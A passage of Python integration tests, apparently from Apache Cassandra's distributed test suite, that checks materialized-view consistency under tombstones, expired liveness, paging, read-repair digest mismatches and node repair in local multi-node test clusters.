session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=1
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
# increase b ts to 10
self.update_view(session, "UPDATE t USING TIMESTAMP 10 SET b = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET a = 2 WHERE k = 1;", flush, compact=True)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# able to shadow view row even if base-column in view pk's ts is smaller than row timestamp
# set row TS = 20, a@6, b@20
self.update_view(session, "DELETE FROM t USING TIMESTAMP 5 where k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, None, 2, 10])
assert_none(session, "SELECT k,a,b,writetime(b) FROM mv")
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 6;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
self.update_view(session, "INSERT INTO t (k, b) VALUES (1, 1) USING TIMESTAMP 20;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 1, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 2, 1, 7, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 1, 20])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 8 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 1, 1, 8, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# create another view row
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (2, 2, 2);", flush)
assert_one(session, "SELECT k,a,b FROM t WHERE k = 2", [2, 2, 2])
assert_one(session, "SELECT k,a,b FROM mv WHERE k = 2", [2, 2, 2])
# stop node2, node3
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
logger.debug('Shutdown node3')
node3.stop(wait_other_notice=True)
# shadow a = 1, create a = 2
query = SimpleStatement("UPDATE t USING TIMESTAMP 9 SET a = 2 WHERE k = 1", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
# shadow (a=2, k=2) after 3 seconds
query = SimpleStatement("UPDATE t USING TTL 3 SET a = 2 WHERE k = 2", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
logger.debug('Starting node2')
node2.start(wait_for_binary_proto=True)
logger.debug('Starting node3')
node3.start(wait_for_binary_proto=True)
# For k = 1 & a = 1, We should get a digest mismatch of tombstones and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 0 == len(result.current_rows)
# For k = 1 & a = 1, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert_none(session, "SELECT * FROM mv WHERE k = 1 AND a = 1")
assert 0 == len(result.current_rows)
# For k = 1 & a = 2, We should get a digest mismatch of data and repaired for a = 2
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 1 == len(result.current_rows)
# For k = 1 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 1 == len(result.current_rows)
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv WHERE k = 1", [1, 2, 1, 20])
time.sleep(3)
# For k = 2 & a = 2, We should get a digest mismatch of expired and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 2 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
logger.debug(result.current_rows)
assert 0 == len(result.current_rows)
# For k = 2 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 0 == len(result.current_rows)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes1(self):
self._test_expired_liveness_with_limit(rf=1, nodes=1)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes3(self):
self._test_expired_liveness_with_limit(rf=1, nodes=3)
@since('3.0')
def test_expired_liveness_with_limit_rf3(self):
self._test_expired_liveness_with_limit(rf=3, nodes=3)
def _test_expired_liveness_with_limit(self, rf, nodes):
"""
Test MV with expired liveness limit is properly handled
@jira_ticket CASSANDRA-13883
"""
session = self.prepare(rf=rf, nodes=nodes, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
for k in range(100):
session.execute("INSERT INTO t (k, a, b) VALUES ({}, {}, {})".format(k, k, k))
# generate view rows with expired liveness, except for rows 50 and 99
for k in range(100):
if k == 50 or k == 99:
continue
session.execute("DELETE a FROM t where k = {};".format(k))
# there should be 2 live data
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
# verify IN
keys = range(100)
assert_one(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 1".format(', '.join(str(x) for x in keys)),
[50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 2".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({})".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
# verify paging: with a fetch size of 1, expired-liveness rows must be skipped across page boundaries
session.default_fetch_size = 1
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_with_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=True)
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_without_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=False)
def _test_base_column_in_view_pk_commutative_tombstone_(self, flush):
"""
view row deletion should be commutative with newer view livenessInfo, otherwise deleted columns may be resurrected.
@jira_ticket CASSANDRA-13409
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
# sstable 1, Set initial values TS=1
self.update_view(session, "INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 1", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, 'a', 3.0])
# sstable 2, delete the base row at TS=2, which tombstones the view row (v=1)
self.update_view(session, "DELETE FROM t USING TIMESTAMP 2 WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_none(session, "SELECT * FROM t")
# sstable 3, tombstones of mv created by base deletion should remain.
self.update_view(session, "INSERT INTO t (id, v) VALUES (1, 1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None])
# sstable 4, shadow view row (id=1, v=1), insert (id=1, v=2, ts=4)
self.update_view(session, "UPDATE t USING TIMESTAMP 4 set v = 2 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [2, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 2, None, None])
# sstable 5, shadow view row (id=1, v=2), insert (id=1, v=1 ts=5)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = 1 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
# shadow view row (id=1, v=1)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = null WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_one(session, "SELECT * FROM t", [1, None, None, None])
def test_view_tombstone(self):
"""
Test that materialized view rows are properly tombstoned
@jira_ticket CASSANDRA-10261
@jira_ticket CASSANDRA-10910
"""
self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.max_trace_wait = 120
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=0, verify
session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'a', 3.0]
)
session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
# change v's value and TS=3, tombstones v=1 and adds v=0 record
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1",
consistency_level=ConsistencyLevel.QUORUM))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
node2.start(wait_for_binary_proto=True)
# We should get a digest mismatch
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
# We should not get a digest mismatch the second time
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
# Verify values one last time
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0],
cl=ConsistencyLevel.ALL
)
def check_trace_events(self, trace, expect_digest):
# Inspect the query trace for read-repair digest mismatch events.
# Look for messages like:
# 4.0+ Digest mismatch: Mismatch for key DecoratedKey
# <4.0 Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: ([a-zA-Z.]+:\s)?Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
pytest.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
pytest.fail("Didn't find digest mismatch")
def test_simple_repair_by_base(self):
self._simple_repair_test(repair_base=True)
def test_simple_repair_by_view(self):
self._simple_repair_test(repair_view=True)
def _simple_repair_test(self, repair_base=False, repair_view=False):
"""
Test that a materialized view is consistent after a simple repair.
"""
session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
for i in range(1000):
statement = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
assert_unavailable(
session.execute,
statement
)
logger.debug('Start node2, and repair')
node2.start(wait_for_binary_proto=True)
if repair_base:
node1.nodetool("repair ks t")
if repair_view:
node1.nodetool("repair ks t_by_v")
logger.debug('Verify the data in the MV with CL=ALL. All should be available now and no digest mismatch')
for i in range(1000):
query = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert self._rows_to_list(result.current_rows) == [[i, i, 'a', 3.0]]
def test_base_replica_repair(self):
self._base_replica_repair_test()
def test_base_replica_repair_with_contention(self):
"""
Test repair does not fail when there is MV lock contention
@jira_ticket CASSANDRA-12905
"""
self._base_replica_repair_test(fail_mv_lock=True)
def _base_replica_repair_test(self, fail_mv_lock=False):
"""
Test that a materialized view is consistent after the repair of the base replica.
"""
self.prepare(rf=3)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Write initial data')
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug('Shutdown node1')
node1.stop(wait_other_notice=True)
logger.debug('Delete node1 data')
node1.clear(clear_all=True)
jvm_args = []
if fail_mv_lock:
if self.cluster.version() >= LooseVersion('3.10'): # CASSANDRA-10134
jvm_args = ['-Dcassandra.allow_unsafe_replace=true', '-Dcassandra.replace_address={}'.format(node1.address())]
jvm_args.append("-Dcassandra.test.fail_mv_locks_count=1000")
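# The fail_mv_locks_count flag presumably makes the first N attempts to acquire the MV partition lock fail, simulating lock contention during repair (see CASSANDRA-12905).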
# this should not make Keyspace.apply throw a WriteTimeoutException on failure to acquire the MV lock
node1.set_configuration_options(values={'write_request_timeout_in_ms': 100})
logger.debug('Restarting node1 with jvm_args={}'.format(jvm_args))
node1.start(wait_for_binary_proto=True, jvm_args=jvm_args)
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
logger.debug('Verify that there is no data on node1')
for i in range(1000):
assert_none(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i)
)
logger.debug('Restarting node2 and node3')
node2.start(wait_for_binary_proto=True)
node3.start(wait_for_binary_proto=True)
# Just repair the base replica
logger.debug('Starting repair on node1')
node1.nodetool("repair ks t")
logger.debug('Verify data with cl=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
@pytest.mark.resource_intensive
def test_complex_repair(self):
"""
Test that a materialized view is consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
"WITH gc_grace_seconds = 5")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop()
node3.stop(wait_other_notice=True)
logger.debug('Write initial data to node1 (will be replicated to node4 and node5)')
for i in range(1000):
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
logger.debug('Verify the data in the MV on node1 with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Close connection to node1')
session.cluster.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
for i in range(1000):
assert_none(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
)
logger.debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
for i in range(1000):
# we write i*2 as value, instead of i
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
logger.debug('Verify the new data in the MV on node2 with CL=ONE')
for i in range(1000):
v = i * 2
assert_one(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0]
)
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
logger.debug('Read data from MV at QUORUM (old data should be returned)')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
logger.debug('Read data from MV at quorum (new data should be returned after repair)')
for i in range(1000):
v = i * 2
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
@pytest.mark.resource_intensive
def test_throttled_partition_update(self):
"""
        @jira_ticket CASSANDRA-13299, test breaking up a large partition when repairing the base table with an MV.
        Provide a configurable batch size (cassandra.mv.mutation.row.count=100) to throttle the number
        of rows to be applied in one mutation
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
session.execute("CREATE TABLE ks.t (pk int, ck1 int, ck2 int, v1 int, v2 int, PRIMARY KEY(pk, ck1, ck2))")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE pk IS NOT NULL AND ck1 IS NOT NULL AND ck2 IS NOT NULL "
"PRIMARY KEY (pk, ck2, ck1)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
size = 50
range_deletion_ts = 30
partition_deletion_ts = 10
for ck1 in range(size):
for ck2 in range(size):
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (1, {}, {}, {}, {}) USING TIMESTAMP {}".format(ck1, ck2, ck1, ck2, ck1))
self._replay_batchlogs()
for ck1 in range(size):
for ck2 in range(size):
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
logger.debug('Shutdown node4 and node5')
node4.stop(wait_other_notice=True)
node5.stop(wait_other_notice=True)
for ck1 in range(size):
for ck2 in range(size):
if ck1 % 2 == 0: # range tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 50 WHERE pk=1 AND ck1={}".format(ck1))
elif ck1 == ck2: # row tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 60 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
session.execute("DELETE v2 FROM ks.t USING TIMESTAMP 70 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
# range deletion
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 < 30 and ck1 > 20".format(range_deletion_ts))
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 = 20 and ck2 < 10".format(range_deletion_ts))
# partition deletion for ck1 <= partition_deletion_ts
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1".format(partition_deletion_ts))
# only partition deletion for the pk=2000
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=2000".format(partition_deletion_ts))
self._replay_batchlogs()
# start nodes with different batch size
logger.debug('Starting nodes')
node2.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(2)])
node3.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5)])
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(50)])
node5.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5000)])
self._replay_batchlogs()
logger.debug('repairing base table')
node1.nodetool("repair ks t")
# insert data to the deleted partition with pk=2000, they should be considered dead
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (2000, 0, 0, 0, 0) USING TIMESTAMP {}".format(partition_deletion_ts - 1))
self._replay_batchlogs()
logger.debug('stop cluster')
self.cluster.stop()
logger.debug('rolling restart to check repaired data on each node')
for node in self.cluster.nodelist():
logger.debug('starting {}'.format(node.name))
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
for ck1 in range(size):
for ck2 in range(size):
if (
ck1 <= partition_deletion_ts or # partition deletion
ck1 == ck2 or ck1 % 2 == 0 or # row deletion or range tombstone
(ck1 > 20 and ck1 < 30) or (ck1 == 20 and ck2 < 10) # range tombstone
):
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
else:
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
# Verify partition deletion with pk=2000 has no live data
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=2000")
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=2000")
logger.debug('stopping {}'.format(node.name))
node.stop(wait_other_notice=True, wait_for_binary_proto=True)
@pytest.mark.resource_intensive
def test_really_complex_repair(self):
"""
        Test that a materialized view is consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
        # we create the base table with gc_grace_seconds=1 so the batchlog will expire after 1 second
session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
"WITH gc_grace_seconds = 1")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
"v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
session.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
session2.execute('USE ks')
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
logger.debug('Write new data in node2 that overlap those in node1')
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
logger.debug("Composite delete of everything")
session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
